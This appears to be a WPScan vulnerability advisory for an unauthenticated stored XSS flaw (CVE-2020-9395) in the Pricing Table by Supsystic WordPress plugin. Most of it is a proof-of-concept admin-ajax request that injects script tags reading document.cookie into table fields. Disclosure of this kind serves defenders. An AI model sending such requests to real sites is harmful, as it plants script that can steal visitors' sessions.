Pricing Table by Supsystic < 1.8.2 - Unauthenticated Stored XSS



Description
No permission check on the ImportJSONTable endpoint allows for malicious javascript to be injected by unauthenticated users.
Proof of Concept
URL/wp-admin/admin-ajax.php?mod=tables&action=importJSONTable&data%5B0%5D%5Bid%5D=11&data%5B0%5D%5Bunique_id%5D=Pwn8M1EB&data%5B0%5D%5Blabel%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Boriginal_id%5D=11&data%5B0%5D%5Bparams%5D%5Bbg_color%5D%5Bval%5D=%23424242&data%5B0%5D%5Bparams%5D%5Btxt_item_html%5D%5Bval%5D=%3Cdiv+class%3D%22ptsEl%22+data-el%3D%22table_cell_txt%22+data-type%3D%22txt%22%3E%3Cp%3E%3Cspan+style%3D%22font-size%3A+12pt%3B%22+data-mce-style%3D%22font-size%3A+12pt%3B%22%3EYour+Text%3C%2Fspan%3E%3C%2Fp%3E%3C%2Fdiv%3E&data%5B0%5D%5Bparams%5D%5Bimg_item_html%5D%5Bval%5D=%3Cdiv+class%3D%22ptsEl+ptsElImg+ptsElWithArea%22+data-el%3D%22table_cell_img%22+data-type%3D%22img%22%3E%0D%0A%09%3Cdiv+class%3D%22ptsElArea%22%3E%3Cimg+src%3D%22http%3A%2F%2Fsupsystic-42d7.kxcdn.com%2F_assets%2Ftables%2Fimg%2Fexample.jpg%22+%2F%3E%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E&data%5B0%5D%5Bparams%5D%5Bicon_item_html%5D%5Bval%5D=%3Cdiv+data-icon%3D%22fa-cog%22+data-color%3D%22rgb(0%2C+220%2C+223)%22+data-type%3D%22icon%22+data-el%3D%22table_cell_icon%22+class%3D%22ptsIcon+ptsEl+ptsElInput%22%3E%3Ci+class%3D%22fa+fa-2x+ptsInputShell+fa-cog%22+style%3D%22color%3A+rgb(0%2C+220%2C+223)%3B%22%3E%3C%2Fi%3E%3C%2Fdiv%3E&data%5B0%5D%5Bparams%5D%5Bnew_column_html%5D%5Bval%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bparams%5D%5Bnew_cell_html%5D%5Bval%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bparams%5D%5Bcell_color_css%5D%5Bval%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bparams%5D%5Benb_desc_col%5D%5Bval%5D=1&data%5B0%5D%5Bparams%5D%5Bcol_width%5D%5Bval%5D=186&data%5B0%5D%5Bparams%5D%5Bcols_num%5D%5Bval%5D=4&data%5B0%5D%5Bparams%5D%5Brows_num%5D%5Bval%5D=5&data%5B0%5D%5Bparams%5D%5Bcalc_width%5D%5Bval%5D=table&data%5B0%5D%5Bparams%5D%5Btable_width%5D%5Bval%5D=100&data%5B0%5D%5Bparams%5D%5Btable_width_measure%5D%5Bval%5D=%25&data%5B0%5D%5Bparams%5D%5Benb_hover_animation%5D%5Bval%5D=1&data%5B0%5D%5Bparams%5D%5Bfont_family%5D%5Bval%5D=Raleway&data%5B0%5D%5Bparams%5D%5Btext_color%5D%5Bval%5D=%23000&data%5B0%5D%5Bparams%5D%5Btext_color_header%5D%5Bval%5D=%23808080&data%5B0%5D%5Bparams%5D%5Btext_color_desc%5D%5Bval%5D=%23808080&data%5B0%5D%5Bparams%5D%5Bresp_min_col_width%5D%5Bval%5D=150&data%5B0%5D%5Bparams%5D%5Bis_horisontal_row_type%5D%5Bval%5D=0&data%5B0%5D%5Bhtml%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bcss%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bimg%5D=gradient-standard.jpg&data%5B0%5D%5Bsort_order%5D=0&data%5B0%5D%5Bis_base%5D=1&data%5B0%5D%5Bis_pro%5D=0&data%5B0%5D%5Bdate_created%5D=2020-01-16+00%3A40%3A10&data%5B0%5D%5Bimg_url%5D=http%3A%2F%2Fsupsystic-42d7.kxcdn.com%2F_assets%2Ftables%2Fimg%2Fprev%2Fgradient-standard.jpg&data%5B0%5D%5Bsession_id%5D=715993&data%5B0%5D%5Bview_id%5D=ptsBlock_715993&data%5B0%5D%5Bcat_code%5D=price_table&update_with_same_id=1&pl=pts&reqType=ajax

Affects Plugin

fixed in version 1.8.2

References

CVE 2020-9395
URL https://www.wordfence.com/blog/2020/02/multiple-vulnerabilities-patched-in-pricing-table-by-supsystic-plugin/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://www.wordfence.com/
Submitter Twitter infosecchloe
Views 1672
Verified No
WPVDB ID 10091

Timeline

Publicly Published 2020-02-25 (4 months ago)
Added 2020-02-25 (4 months ago)
Last Updated 2020-02-26 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin